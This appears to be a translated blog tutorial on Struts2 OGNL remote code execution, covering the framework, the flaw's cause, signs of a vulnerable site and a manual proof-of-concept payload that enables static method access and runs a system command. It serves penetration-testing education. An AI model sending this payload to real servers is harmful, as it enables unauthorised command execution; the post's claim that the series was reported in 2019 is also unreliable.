The third lesson of in-depth study of network security - Popular framework vulnerabilities (RCE-Struts2 remote code execution)

Enterprise 2023-09-19 11:11:55 views: null

Article directory

1. Introduction to Struts2 framework

------ Struts2 is a web framework under the apache project, commonly used inInternet, government and corporate portals such as Alibaba and JD.com

------ The Struts framework itself is divided into three parts: core controller FilterDispatcher, business controller Action and user-implemented enterprise business logic components.

2. Struts2 remote code execution vulnerability

------ The Struts2 vulnerability is a classic vulnerability series that was reported in 2019. The root cause is that Struts2 introduced OGNL expressions to make the framework flexible and dynamic. With the patching of the overall framework improved, it will now be much more difficult to discover new Struts2 vulnerabilities than before. Judging from the actual situation, most users have already repaired historical high-risk vulnerabilities. Currently, when doing penetration testing, Struts2 vulnerabilities are mainly left to chance, or it will be more effective to attack unpatched systems after being exposed to the intranet.

3. The principle of Struts2 execution code

------ The dynamic nature of Struts2 is that OGNL表达式you can get the value of the running variable and have the opportunity to execute function calls. If malicious request parameters can be sent to the execution process of OGNL, an arbitrary code execution vulnerability will result.

------ The essence of Struts2's rce is the same (except for S2-052). The Struts2 framework executes the OGNL expression passed in by a malicious user, causing remote code execution. It can cause "command execution, server file operation, print echo, obtain system properties, dangerous code execution", etc., but it requires careful construction of different OGNL codes.

4. Struts2 framework features

  1. Check the source code of the application system under test, the URL interface address is “.action” “.do”结尾or 地址中包含“!”符号;

  2. On the server of the application under test, check the jar file in the directory /WEB-INF/lib/ where the application is located. If there is a struts2-core2.*.**.jar 或 xwork-core-2.*.**.jarjar file in the format, you need to detect whether there is a Struts2 remote code execution vulnerability.

5. Vulnerability manual POC

poc:

(%23_memberAccess[‘allowPrivateAccess’]=true,%23_memberAccess[‘allowProtectedAccess’]=true,%23_memberAccess[‘excludedPackageNamePatterns’]=%23_memberAccess[‘acceptProperties’],%23_memberAccess[‘excludedClasses’]=%23_memberAccess[‘acceptProperties’],%23_memberAccess[‘allowPackageProtectedAccess’]=true,%23_memberAccess[‘allowStaticMethodAccess’]=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘id’).getInputStream()))

注意:有些情况利用的时候要记得url编码

For other struts2 versions of POC, please refer to:
https://vulhub.org/#/environments/struts2/

6. Recurrence of vulnerability tools

Insert image description here

Guess you like

Origin blog.csdn.net/p36273/article/details/132920600
Recommended
Ranking
A quick primer on numpy basics
Two sister tease python project
Java | Multiple keywords in the replacement content are returned to the front end in red style
C ++: references
The string leetcood 1018 is a binary prefix divisible by 5
Flutter 布局组件
Java combat spingboot-redis
PMP pre-exam sprint and wrong questions sorting
ActiveMq C# Message Features: Delayed and Timed Message Delivery
DSP28377S_ copy a program from the RAM to FLASH portion DETAILS
Daily
More
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)

Code World

© 2018 codetd.com